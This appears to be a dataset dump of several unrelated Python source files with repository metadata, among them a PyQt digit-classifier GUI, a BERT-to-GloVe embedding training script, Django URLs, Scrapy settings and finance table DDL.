def mouseReleaseEvent(self, event):
if event.button == Qt.LeftButton:
self.drawing = False
#%% GUI
class Window(QMainWindow):
def __init__(self):
super().__init__()
# main window
self.width = 1080 # eni
self.height = 640 # boyu
self.setWindowTitle("Digit Classification")
self.setGeometry(50, 100, self.width, self.height)
self.setWindowIcon(QIcon("icon1.png")) # projede kullanacağımız resim için
self.create_canvas = Canvas() # yukarda yaptığımız canvas classını ekledik.
self.tabWidget()
self.widgets()
self.layouts()
self.show()
# 2 tane tabımız var, classification tabı içinde tüm olay gerçekleşiyor.
# parametre tabı içinde nöral networkte kullandığım parametreleri gösterdiğim kısım olucak.
# 1 tane ana tabs widget'im olucak, bunun altına 2 tane tab ekliyeceğim
def tabWidget(self):
self.tabs = QTabWidget()
self.setCentralWidget(self.tabs)
self.tab1 = QWidget()
self.tab2 = QWidget()
self.tabs.addTab(self.tab1, "Classification")
self.tabs.addTab(self.tab2, "Parameters")
# classification tabı üzerinde input img, settings, output, result olmak üzere 4 tane layout var.
def widgets(self):
# tab1 left;
# 2 tane buton, 2 label, 1 tane line edit yapmayı sağlayan entry widget bulunmaktadır.
self.drawCanvas = QPushButton("Draw Canvas")
self.drawCanvas.clicked.connect(self.drawCanvasFunction)
# buna bastığımız zaman bizim kullanıcı arayüzü sayesinde oraya bir tane rakam yazabilmemiz gerekiyor.
# bu rakamı yazabilmemiz için de bir tane fonksiyona bağlanması gerekiyor.
self.openCanvas = QPushButton("Open Canvas")
self.openCanvas.clicked.connect(self.openCanvasFunction)
self.inputImage = QLabel(self) # bu input image variable'yle oraya bir tane rakam çizdikten sonra onu oraya yükleme işlemi gerçekleştiricem.
self.inputImage.setPixmap(QPixmap("input.png"))
self.searchText = QLabel("Real number: ")
# sınıflandırmak istediğim aradığım sayısını labeli yani gerçekte resmini çizdiğim rakamın ne olduğunu yazıyorum.
self.searchEntry = QLineEdit()
self.searchEntry.setPlaceholderText("Which number do you write?")
# tab1 left middle;
# 1 combobox, 1 label, 1 slider, 1 checkbox, 1 buton bulunmaktadır.
self.methodSelection = QComboBox(self)
self.methodSelection.addItems(["model1","model2"]) # 2 tane item ekledik.
self.noiseText = QLabel("Add Noise: % " + "0") # sonuçların ne çıktığını görmek için ekledik.
# en sonda default olarak 0 değerini koyuyoruz yani başlangıçta burada herhangi bir noise bulunmuyor demektir.
self.noiseSlider = QSlider(Qt.Horizontal) # noise değerini seçeceğimiz slider ekledik. yatay olarak
self.noiseSlider.setMinimum(0) # min değeri
self.noiseSlider.setMaximum(100) # max değeri
self.noiseSlider.setTickPosition(QSlider.TicksBelow) # slider üzerinde bulunan tiklerin yani birimlerin nerede bulunacağını belirliyoruz.
# bunların pozisyonunu slider altına koyuyoruz TickBelow methodu ile
self.noiseSlider.setTickInterval(1) # tiklerin kalınlığını 1 birim belirledik.
self.noiseSlider.valueChanged.connect(self.noiseSliderFunction)
# slider da meydana gelen değişikliği yansıtacağım bir fonksiyon ekledik.
self.remember = QCheckBox("Save Result", self)
# bunu sonuçlarımı kaydetmek isteyip istememe göre seçeceğim bir checkbox olarak oluşturuyorum. eğer buna tıklarsam sonuçlarım kaydedilecek.
self.predict = QPushButton("Predict")
self.predict.clicked.connect(self.predictionFunction)
# tab1 right middle
# 2 tane label mevcut, labellerin üzerine resim ekliyoruz.
# 1. label de prediction sonucunu yazıcağımız image olucak,
self.outputImage = QLabel(self)
self.outputImage.setPixmap(QPixmap("icon1.png")) # pixmap: bir resmi yüklemek
# 2. label prediction sonucunu yani outputu yazacağımız label.
self.outputLabel = QLabel("", self)
self.outputLabel.setAlignment(Qt.AlignCenter) # bu komutla output labeli merkeze hizalamış olduk.
# tab1 right; 1 tane table widget bulunmaktadır.
self.resultTable = QTableWidget()
self.resultTable.setColumnCount(2) # 2 sütuna sahip
self.resultTable.setRowCount(10) # 10 satır çünkü 10 sınıfımız var
self.resultTable.setHorizontalHeaderItem(0, QTableWidgetItem("Label(Class)")) # 0.indeks column yazdık
self.resultTable.setHorizontalHeaderItem(1, QTableWidgetItem("Probability")) # 1.indeks column yazdık.
# probability: class'ların sonucunda çıkan değerlerdir yani diyelim ki 1 sayısı çıktı olasılığı da %5;
# %5 olasılıkla benim left kısmına çizeceğim resim 1 sayısına aittir şeklinde bir sonuç ortaya çıkacak.
# parametre tabında 2 tane list widget mevcut, bunların üzerinde method1 ve method2 adlı layout bulunuyor.
# tab2 method1
self.parameter_list1 = QListWidget(self)
# kullandığımız parametreleri ekledik.
self.parameter_list1.addItems(["batch_size = 256","epochs = 5","img_rows = 28",
"img_cols = 28","Filter # = [16,32,64]","Activation Function = Relu",
"loss = categorical cross entropy",
"optimizer = Adadelta","metrics = accuracy"])
# tab2 method2
self.parameter_list2 = QListWidget(self)
self.parameter_list2.addItems(["batch_size = 256","epochs = 5","img_rows = 28",
"img_cols = 28","Filter # = [8,16,32]","Activation Function = Relu",
"loss = categorical cross entropy",
"optimizer = Adadelta","metrics = accuracy"])
# sınıflandırma aşaması
# gerçekte ne çizdiğimizi real number kısmına yazıyoruz çünkü resultları kaydederken kullanıcaz.
def predictionFunction(self):
save_string = "" # entry den aldığımız değerleri depolucaz.
real_entry = self.searchEntry.text()
save_string = save_string + " real entry: " + str(real_entry) + ", "
# CNN model selection
# hangi modeli seçeceğim işlemi
model_name = self.methodSelection.currentText()
# currentText şu işe yarayabilir;
if model_name == "model1":
model = load_model("model1.h5")
elif model_name == "model2":
model = load_model("model2.h5")
else:
print("Error")
# kaydetmek istediğimiz modeli de ekledik içine
save_string = save_string + "model name: " + str(model_name) + ", "
# slider e noise ekleme işlemi yani resmi bozmak gibi
noise_val = self.noiseSlider.value() # slider üzerinde belirlediğim değeri alıyor.
# 0 dan farklı bir noise değerim varsa
if noise_val != 0:
noise_array = np.random.randint(0, noise_val, (28, 28))/100
# random integer: 0 ile noise_val değerleri arasında noise değerleri üret demek, bundan kaç tane üret demek 28x28'lik bir matris şeklinde üret demektir.
# 3. parametre de 28'e 28'lik bir integer oluşturmak istiyorum ve normalize etmek için 100'e bölüyoruz.
# yani 0 ile 1 arasında sıkıştır demek oluyor.
else:
noise_array = np.zeros([28, 28]) # boş bir array
save_string = save_string + "noise value: " + str(noise_val) + ", "
print(save_string)
# load image as numpy
# img okuyoruz, en sonda ayar yapıyoruz çünkü kendisi otomatik olarak bir offset koyuyor
# böyle yapmazsak 0 dan 26 ya olan kısımlar boş sayfa olarak gözüküyor
img_array = mpimg.imread("input_img.png")[26:175, 26:175, 0]
# resmin boyutunu 28x28 küçültüyor
resized_img_array = cv2.resize(img_array, dsize=(28, 28), interpolation = cv2.INTER_CUBIC)
# add noise
resized_img_array = resized_img_array + noise_array
# vis noise image
plt.imshow(resized_img_array, cmap = "gray")
plt.title("image after adding noise and resize")
# predict
# elde ettiğimiz resmin önce boyutlarını ayarlıyoruz.
result = model.predict(resized_img_array.reshape(1, 28, 28, 1))
QMessageBox.information(self,"Information","Classification is completed.")
predicted_class = np.argmax(result) # sonuçların maxını bulma
print("Prediction: ", predicted_class)
save_string = save_string + "Predicted class: " + str(predicted_class)
# save result, eğer kaydetmeyi seçersem
if self.remember.isChecked():
text_file = open("Output.txt","w")
text_file.write(save_string)
text_file.close()
else:
print("not save")
# prediction'u output label üzerine görüntü olarak ekleme
self.outputImage.setPixmap(QPixmap("images\\" + str(predicted_class) + ".png"))
# outpu labele okuduğum dosyayı setText methodu kullanarak yazmak istiyoruz.
self.outputLabel.setText("Real: " + str(real_entry) + " and Predicted: " + str(predicted_class))
# set result
for row in range(10):
self.resultTable.setItem(row, 0, QTableWidgetItem(str(row)))
self.resultTable.setItem(row, 1, QTableWidgetItem(str(np.round(result[0][row], 5))))
# 1.column da 0. indeksi virgülden sonra 5 basamak göster.
# bunun içinde oluşturduğum classı göstermem gerekiyor. Bunun öncesinde canvas objesi oluşturmamız gerekiyor.
# bunu yapabilmek için canvas classını yazmamız gerekiyor yani sıfırdan kodluyacağımız bir class olacak.
def drawCanvasFunction(self):
self.create_canvas.show() # butona bastığım zaman canvası görselleştirmiş olacağım.
def openCanvasFunction(self):
self.inputImage.setPixmap(QPixmap("input_img.png")) # bu butona basınca soru işareti olan yere çizdiğimiz resim yüklenmiş olacak.
def noiseSliderFunction(self):
val = self.noiseSlider.value() # slider değerini okuyoruz ve val içierisine yazıyoruz.
self.noiseText.setText("Add Noise: % " + str(val)) # orada bulunan labeli set ediyoruz. Bu sefer 0 yerinde kendi sliderimde olan değeri seçicem.
# sayfa düzeni için;
# her bir tabın üzerinde bulunan şeylere widget diyoruz. bu widgetler formlayout üzerinde bulunuyor.
# formlayout adlandırdığım şey aslında left diye yazdığım yer.
# formlayout üzerinde yani left layoutta groupbox bulunuyor, left kısmında input image yazan kısım groupbox'ımız.
# gorupbox üzerinde bir tane horizontol layout bulunuyor.
# horizontol layout üzerinde tab1 widget bulunuyor. tab1 değiğimiz şey burdaki classification
def layouts(self):
# tab1 layout
self.mainLayout = QHBoxLayout()
self.leftLayout = QFormLayout()
self.leftMiddleLayout = QFormLayout()
self.rightMiddleLayout = QFormLayout()
self.rightLayout = QFormLayout()
# left
self.leftLayoutGroupBox = QGroupBox("Input Image") # en dışında
self.leftLayout.addRow(self.drawCanvas)
self.leftLayout.addRow(self.openCanvas)
self.leftLayout.addRow(self.inputImage)
self.leftLayout.addRow(self.searchText)
self.leftLayout.addRow(self.searchEntry)
self.leftLayoutGroupBox.setLayout(self.leftLayout) # groupboxa left layout ekledik.
# left middle
self.leftMiddleLayoutGroupBox = QGroupBox("Settings")
self.leftMiddleLayout.addRow(self.methodSelection)
self.leftMiddleLayout.addRow(self.noiseText)
self.leftMiddleLayout.addRow(self.noiseSlider)
self.leftMiddleLayout.addRow(self.remember)
self.leftMiddleLayout.addRow(self.predict)
self.leftMiddleLayoutGroupBox.setLayout(self.leftMiddleLayout)
# right middle
self.rightMiddleLayoutGroupBox = QGroupBox("Output")
self.rightMiddleLayout.addRow(self.outputImage)
self.rightMiddleLayout.addRow(self.outputLabel)
self.rightMiddleLayoutGroupBox.setLayout(self.rightMiddleLayout)
# right
self.rightLayoutGroupBox = QGroupBox("Result")
self.rightLayout.addRow(self.resultTable)
self.rightLayoutGroupBox.setLayout(self.rightLayout)
# tab1 deki layoutları main layouta ekliyoruz.
self.mainLayout.addWidget(self.leftLayoutGroupBox, 25) # en sonuncu parametre yüzdelik olarak ne kadar yer kaplıyacağı
self.mainLayout.addWidget(self.leftMiddleLayoutGroupBox, 25)
self.mainLayout.addWidget(self.rightMiddleLayoutGroupBox, 25)
self.mainLayout.addWidget(self.rightLayoutGroupBox, 25)
self.tab1.setLayout(self.mainLayout) # mainlayoutu tab1'e ekledik.
# tab2 layout
self.tab2Layout = QHBoxLayout()
self.tab2Method1Layout = QFormLayout()
self.tab2Method2Layout = QFormLayout()
# tab2 Method1 Layout
self.tab2Method1LayoutGroupBox = QGroupBox("Method1")
self.tab2Method1Layout.addRow(self.parameter_list1)
self.tab2Method1LayoutGroupBox.setLayout(self.tab2Method1Layout)
# tab2 Method2 Layout
self.tab2Method2LayoutGroupBox = QGroupBox("Method2")
self.tab2Method2Layout.addRow(self.parameter_list2)
self.tab2Method2LayoutGroupBox.setLayout(self.tab2Method2Layout)
# tab2 deki layoutları main layouta ekliyoruz.
self.tab2Layout.addWidget(self.tab2Method1LayoutGroupBox, 50)
self.tab2Layout.addWidget(self.tab2Method2LayoutGroupBox, 50)
self.tab2.setLayout(self.tab2Layout) # tab2 layoutu tab2'ye ekledik
app = QApplication(sys.argv)
window = Window()
window.show()
sys.exit(app.exec())
| [
"rabia8940@gmail.com"
] | rabia8940@gmail.com |
5f6125e1653f98b3cd435fbb27e389a8d9bf676d | c033b4bc0b80938192712a336a941f921b056106 | /PythonK/FirstPython/Actual/Chapter7/venv/Scripts/pip3.6-script.py | 8c4ea0adf094c7250d2fa2c3df53aa8e4c53ad4f | [] | no_license | BigBrou/Laboratory | 4e9a92cbccf2379c8fedb5abbb5dc896a477d018 | 2ec4ece91bf7d5774d7028c3ea620a36b279bfbb | refs/heads/master | 2020-03-24T16:48:25.017498 | 2018-12-27T09:04:13 | 2018-12-27T09:04:34 | 142,837,539 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 416 | py | #!C:\Laboratory\PythonK\Actual\Chapter7\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==10.0.1','console_scripts','pip3.6'
__requires__ = 'pip==10.0.1'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==10.0.1', 'console_scripts', 'pip3.6')()
)
| [
"kangchoi21@gmail.com"
] | kangchoi21@gmail.com |
9ef1e707cfef298c980ba2d63f51efb5bc17c697 | 041de55260dabd8d00f3b54eb9514ac78b0d49fb | /train.py | 5f9d15b829d9949e49513257318d3ccfd6c96402 | [] | no_license | MikeynJerry/bert-glove-embeddings | 753f6bcf82337c94b30578ccabbf100a05f1ffd5 | 2f880334fe847691878d64289dfddc2afbc4df04 | refs/heads/main | 2023-03-04T14:43:20.118628 | 2021-02-10T06:26:29 | 2021-02-10T06:26:29 | 322,494,720 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,857 | py | """
Paper: https://arxiv.org/abs/2010.11869
Section 4.2: Training Word Piece Embeddings in GloVe Space
Description:
BERT Embeddings are not trained to keep semantically similar tokens close in
the embedding space. To reconcile this, we can train our own embeddings that
correspond to each token in BERT's word-piece vocabulary that lie in GloVe space.
This is useful for tasks such as finding similar tokens during adversarial attacks.
"""
import argparse
from itertools import chain
import json
import torch
from torch.optim import SGD
from torchtext.data import Field
from torchtext.datasets import IMDB
from torchtext.vocab import GloVe
from transformers import BertModel, BertTokenizer
from tqdm import tqdm, trange
def set_seed(seed, set_torch_cuda=False):
torch.manual_seed(seed)
if set_torch_cuda:
torch.cuda.manual_seed(seed)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
def train(
batch_size,
bert_model,
epochs,
glove_dataset,
glove_dim,
save_file,
seed,
stats_file,
):
device = "cuda" if torch.cuda.is_available() else "cpu"
set_seed(seed, device == "cuda")
glove = GloVe(name=glove_dataset, dim=glove_dim)
glove_embeddings = glove.vectors
glove_ids_to_tokens = glove.itos
glove_tokens_to_ids = glove.stoi
bert_tokenizer = BertTokenizer.from_pretrained(bert_model)
bert = BertModel.from_pretrained(bert_model)
bert_embeddings = bert.embeddings.word_embeddings.weight
# E (GloVe embeddings): (N, d)
E = glove_embeddings.to(device)
# T (Word piece tokenization indicator): (N, 30k)
T = torch.zeros(
(glove_embeddings.size(0), bert_embeddings.size(0)),
dtype=torch.bool,
device=device,
)
# E' (BERT GloVe Embeddings): (30k, d)
E_prime = torch.rand(
(bert_embeddings.size(0), glove_embeddings.size(1)),
dtype=torch.float32,
device=device,
requires_grad=True,
)
"""
Initialize T such that T[i, j] is 1 if word i is tokenized (using GloVe) to the
j-th word piece (using BERT) and 0 otherwise.
Example:
'handyman' is tokenized by BERT to 'handy' and '##man'.
'handyman' is token 29172 in GloVe while 'handy' and '##man' are
tokens 18801 and 2386 respectively so T[29172, 18801] and T[29172, 2386]
are 1 while the rest of T[29172, :] is 0
"""
for glove_id, glove_token in enumerate(
tqdm(glove_ids_to_tokens, desc="Building T")
):
bert_tokens = bert_tokenizer.tokenize(glove_token)
# If any of the word pieces aren't in GloVe's vocabulary, we'll ignore them
# This really only applies to certain Unicode characters
if "[UNK]" in bert_tokens:
continue
bert_ids = bert_tokenizer.convert_tokens_to_ids(bert_tokens)
T[glove_id, bert_ids] = True
# Load IMDB Corpus
text = Field(
lower=BertTokenizer.pretrained_init_configuration[bert_model]["do_lower_case"],
tokenize="spacy",
)
label = Field(sequential=False)
train, test = IMDB.splits(text, label)
corpus = torch.tensor(
[
glove_tokens_to_ids[token]
for batch in chain(train, test)
for token in batch.text
if token in glove_tokens_to_ids
],
dtype=torch.long,
device=device,
)
losses = []
# Train
optimizer = SGD([E_prime], lr=1e-4)
for epoch in trange(epochs, desc="Training"):
random_indices = torch.randperm(corpus.size(0))[:batch_size]
random_samples = corpus[random_indices]
optimizer.zero_grad()
loss = torch.sum(
torch.abs(
E[random_samples] - T[random_samples].type(torch.float32) @ E_prime
)
)
losses.append(loss.item())
loss.backward()
optimizer.step()
if stats_file is not None:
with open(stats_file, "w+") as f:
json.dump(losses, f)
torch.save(E_prime, save_file)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--batch-size",
default=5_000,
help="The number of words to sample per training batch (default: %(default)s).",
type=int,
)
parser.add_argument(
"--bert-model",
choices=BertTokenizer.pretrained_init_configuration.keys(),
default="bert-base-uncased",
help="The name of the pre-trained BERT model to use for tokenization (see: https://huggingface.co/transformers/pretrained_models.html, default: %(default)s)",
)
parser.add_argument(
"--epochs",
default=10_000,
help="The number of training epochs to perform (default: %(default)s)",
type=int,
)
parser.add_argument(
"--glove-dim",
default=200,
help="The width of the GloVe word embeddings (default: %(default)s).",
type=int,
)
parser.add_argument(
"--glove-dataset",
choices=GloVe.url.keys(),
default="6B",
help="The dataset GloVe trained on (see: https://nlp.stanford.edu/projects/glove/, default: %(default)s).",
)
parser.add_argument(
"--save-file",
default="bert_glove_embeddings.pt",
help="The filename to save the trained embedding tensor to (default: %(default)s).",
)
parser.add_argument(
"--seed",
default=0,
help="The seed used to for all torch randomization methods (default: %(default)s).",
type=int,
)
parser.add_argument(
"--stats-file", help="Where to save the per-epoch losses while training."
)
args = parser.parse_args()
train(**args.__dict__)
| [
"MikeynJerry@gmail.com"
] | MikeynJerry@gmail.com |
c7dec764dec68f162f3ec5a85ea862a15014b5c5 | 8ef458a868df9c729fa1f31e9b9c4b483c58770a | /todo/urls.py | b36e35d1800bd8450c991275e17ad1167f703692 | [] | no_license | FillGit/tztodo2 | a9fd0abb6c286f9949bb6ee7f6e25e6d03a6b85e | 61e0f38beb490a4fbc85c49129647fad108212dd | refs/heads/master | 2022-12-11T16:35:56.225656 | 2019-05-29T02:54:02 | 2019-05-29T02:54:02 | 189,139,161 | 0 | 0 | null | 2022-12-08T01:46:19 | 2019-05-29T02:51:29 | JavaScript | UTF-8 | Python | false | false | 1,481 | py | from django.urls import path
from django.conf.urls import url
from rest_framework.urlpatterns import format_suffix_patterns
#from rest_framework.authtoken import views
from todo import views
urlpatterns = [
url(r'^todo/set-user-perm/$', views.SetUserPermission.as_view()),
url(r'^users/$', views.UserList.as_view()),
url(r'^todo/companies/$', views.CompanyList.as_view()),
url(r'^todo/desks/$', views.DeskList.as_view()),
url(r'^todo/(?P<name_company>\w+)/token', views.CustomAuthToken.as_view()),
url(r'^todo/(?P<name_company>\w+)/desks', views.CompanyDeskList.as_view()),
url(r'^todo/(?P<name_company>\w+)/(?P<date>[-\w]+)/$', views.CompanyDateList.as_view()),
#url(r'^todo/(?P<company>\w+)/(?P<idsession>\w+)/', views.CompanyList.as_view()),
#url(r'^todo/(?P<pk>\w+)/$', views.company_todo),
#url(r'^todo/done/(?P<pk>\w+)/$', views.todo_done),
#url(r'^todo/detail/(?P<pk>\w+)/$', views.todo_detail),
#url(r'^desks/$', views.desk_list),
#url(r'^desks/detail/$', views.desk_detail),
#url(r'^users/', views.UserList.as_view()),
##url(r'^auth/(?P<pk>\w+)/$', views.auth_user),
#url(r'^users/(?P<pk>\d+)/$', views.UserDetail.as_view()),
#url(r'^profile/(?P<pk>\d+)/$', views.ProfileDetail.as_view()),
#url(r'^user/', views.UserDetail.as_view()),
#url(r'^registration/', views.create_auth),
#url(r'^test/$', views.TestDetail.as_view()),"""
]
urlpatterns = format_suffix_patterns(urlpatterns)
| [
"moandcom@mail.ru"
] | moandcom@mail.ru |
615b0e3ce001a61de185b62a6465cb046a30fcc6 | 416baad7e83075c1c59f1fa920d9a18cd3351f16 | /tensor2tensor/models/__init__.py | 58badcb4e011ce3350c1cf88d2bd7a49cbdc8d59 | [
"Apache-2.0"
] | permissive | jmlingeman/tensor2tensor | aa759fc9101149284b0b6f2f7a03e9759b7214a9 | 9921c4a816aafb76964a960541045ce4d730b3c9 | refs/heads/master | 2021-04-29T01:52:38.283004 | 2018-04-23T20:04:12 | 2018-04-23T20:04:12 | 121,812,413 | 0 | 0 | null | 2018-02-16T23:39:11 | 2018-02-16T23:39:11 | null | UTF-8 | Python | false | false | 1,986 | py | # coding=utf-8
# Copyright 2018 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Models defined in T2T. Imports here force registration."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Dependency imports
# pylint: disable=unused-import
from tensor2tensor.layers import modalities
from tensor2tensor.models import basic
from tensor2tensor.models import bytenet
from tensor2tensor.models import lstm
from tensor2tensor.models import neural_gpu
from tensor2tensor.models import resnet
from tensor2tensor.models import revnet
from tensor2tensor.models import shake_shake
from tensor2tensor.models import slicenet
from tensor2tensor.models import transformer
from tensor2tensor.models import vanilla_gan
from tensor2tensor.models import xception
from tensor2tensor.models.research import aligned
from tensor2tensor.models.research import attention_lm
from tensor2tensor.models.research import attention_lm_moe
from tensor2tensor.models.research import cycle_gan
from tensor2tensor.models.research import gene_expression
from tensor2tensor.models.research import multimodel
from tensor2tensor.models.research import super_lm
from tensor2tensor.models.research import transformer_moe
from tensor2tensor.models.research import transformer_revnet
from tensor2tensor.models.research import transformer_sketch
from tensor2tensor.models.research import transformer_vae
# pylint: enable=unused-import
| [
"rsepassi@google.com"
] | rsepassi@google.com |
1a195c5f10ae761b55203c69b12fcba3bdcadbea | 091b59690f8916b494de20f6354bab09b5bdbb4a | /PY/zhihu/爬虫/spyder/my_spider/my_spider/settings.py | ae170e07ea6dcb3aaf3f7c8dcc7a2b3a6f258e39 | [] | no_license | IRON-HAN/hanhan | e1203f9ab537c076f86150322d6e751c9c1555d9 | 3657b843134aad0b4e8be4ecdded89739b7c51b5 | refs/heads/master | 2020-08-24T09:11:15.396344 | 2020-06-17T07:09:32 | 2020-06-17T07:09:32 | 216,800,871 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,112 | py | # -*- coding: utf-8 -*-
# Scrapy settings for my_spider project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# https://docs.scrapy.org/en/latest/topics/settings.html
# https://docs.scrapy.org/en/latest/topics/downloader-middleware.html
# https://docs.scrapy.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'my_spider'
SPIDER_MODULES = ['my_spider.spiders']
NEWSPIDER_MODULE = 'my_spider.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'my_spider (+http://www.yourdomain.com)'
# Obey robots.txt rules
ROBOTSTXT_OBEY = True
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See https://docs.scrapy.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
#COOKIES_ENABLED = False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED = False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See https://docs.scrapy.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'my_spider.middlewares.MySpiderSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See https://docs.scrapy.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
# 'my_spider.middlewares.MySpiderDownloaderMiddleware': 543,
#}
# Enable or disable extensions
# See https://docs.scrapy.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.extensions.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See https://docs.scrapy.org/en/latest/topics/item-pipeline.html
#ITEM_PIPELINES = {
# 'my_spider.pipelines.MySpiderPipeline': 300,
#}
# Enable and configure the AutoThrottle extension (disabled by default)
# See https://docs.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See https://docs.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
| [
"2674467254@qq.com"
] | 2674467254@qq.com |
76ec8bf5543ffb36898752bdb0bdcbe7ab1cea56 | 728f9ce8d8208ff6cff038d84ac77cce9749ce8a | /pages/product_page.py | 3e88d23d6896693971192289f89534f7f8e9f834 | [] | no_license | TopKesha/TestingProject | 7c1fb59cec4f54c1cb00fe2f7904ee9b191b2675 | 6cfa37954530173edb96feaa63450591c42911ea | refs/heads/master | 2021-07-15T09:42:02.948183 | 2020-03-19T10:57:33 | 2020-03-19T10:57:33 | 247,429,099 | 0 | 0 | null | 2021-06-02T01:11:20 | 2020-03-15T08:34:42 | Python | UTF-8 | Python | false | false | 2,104 | py | from .base_page import BasePage
from .locators import ProductPageLocators
from selenium.webdriver.common.by import By
class ProductPage(BasePage):
def should_add_to_basket(self):
self.should_be_add_button()
basket = self.browser.find_element(*ProductPageLocators.BASKET_BUTTON)
basket.click()
self.solve_quiz_and_get_code()
self.should_be_same_product_in_added_product_message()
self.should_be_message_about_success_discount()
self.should_be_same_item_price_and_price_in_basket()
def should_be_add_button(self):
assert self.is_element_present(*ProductPageLocators.BASKET_BUTTON), "Button Add to busket isn't found"
def should_not_be_success_message(self):
assert self.is_not_element_present(*ProductPageLocators.SUCCESS_MESSAGE), \
"Success message is presented, but should not be"
def should_be_disappeared(self):
assert self.is_disappeared(*ProductPageLocators.SUCCESS_MESSAGE), \
"Success message isn't disappeared, but should be"
def should_be_message_about_success_discount(self):
discount = self.browser.find_element(*ProductPageLocators.DISCOUNT_MSG)
success_text = "Deferred benefit offer"
assert success_text == discount.text, "There is no 'Deferred benefit offer' in discount message"
def should_be_same_product_in_added_product_message(self):
product = self.browser.find_element(*ProductPageLocators.PRODUCT)
added_product_msg = self.browser.find_element(*ProductPageLocators.ADDED_PRODUCT_MSG)
assert product.text == added_product_msg.text, "Product name and added product message do not match"
def should_be_same_item_price_and_price_in_basket(self):
basket_value_msg = self.browser.find_element(*ProductPageLocators.PRICE_IN_BASKET_MSG)
item_price = self.browser.find_element(*ProductPageLocators.ITEM_PRICE)
assert item_price.text == basket_value_msg.text, \
f"Item price and price in basket do not match \n expected {item_price.text}, got {basket_value_msg.text}" | [
"deregodub@gmail.com"
] | deregodub@gmail.com |
f103aafbf715a9b1e105825dc4bb9b2fe7adc430 | d7492659ff9ce2cb2772e79d480b595f91482fe2 | /finance/data/yahoo/ddl.py | bc223520587f40d3b2b2786bf4dae2828feddd91 | [] | no_license | StockScripts/fun-times-in-python | 8e02d4228a9cdf82618a64aa2d6a53e9584cae1a | 4b48f7c475c5efb220561fae919515ef1f78f592 | refs/heads/master | 2022-12-03T20:49:32.124000 | 2020-08-23T17:15:09 | 2020-08-23T17:15:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,225 | py | STOCKS = '''
CREATE TABLE yahoo.stocks (
ticker text,
date_time timestamp without time zone,
open numeric,
high numeric,
low numeric,
close numeric,
adj_close numeric,
volume bigint,
dividend numeric,
split_numerator integer,
split_denominator integer,
index text,
unix_timestamp text,
file_datetime timestamp without time zone,
ingest_datetime timestamp without time zone
);
'''
INCOME_STATEMENTS = '''
CREATE TABLE yahoo.income_statements (
date timestamp without time zone,
ticker text,
metric text,
val numeric(20,6),
file_datetime timestamp without time zone,
ingest_datetime timestamp without time zone
);
'''
BALANCE_SHEETS = '''
CREATE TABLE yahoo.balance_sheets (
date timestamp without time zone,
ticker text,
metric text,
val numeric(20,6),
file_datetime timestamp without time zone,
ingest_datetime timestamp without time zone
);
'''
CASH_FLOWS = '''
CREATE TABLE yahoo.cash_flows (
date timestamp without time zone,
ticker text,
metric text,
val numeric(20,6),
file_datetime timestamp without time zone,
ingest_datetime timestamp without time zone
);
'''
SP_INDEX = '''
CREATE TABLE yahoo.sp_index (
index_name text,
market_datetime timestamp without time zone,
open numeric,
high numeric,
low numeric,
close numeric,
adj_close numeric,
volume bigint,
file_datetime timestamp without time zone,
ingest_datetime timestamp without time zone
)
'''
| [
"rbetzler@94.gmail.com"
] | rbetzler@94.gmail.com |
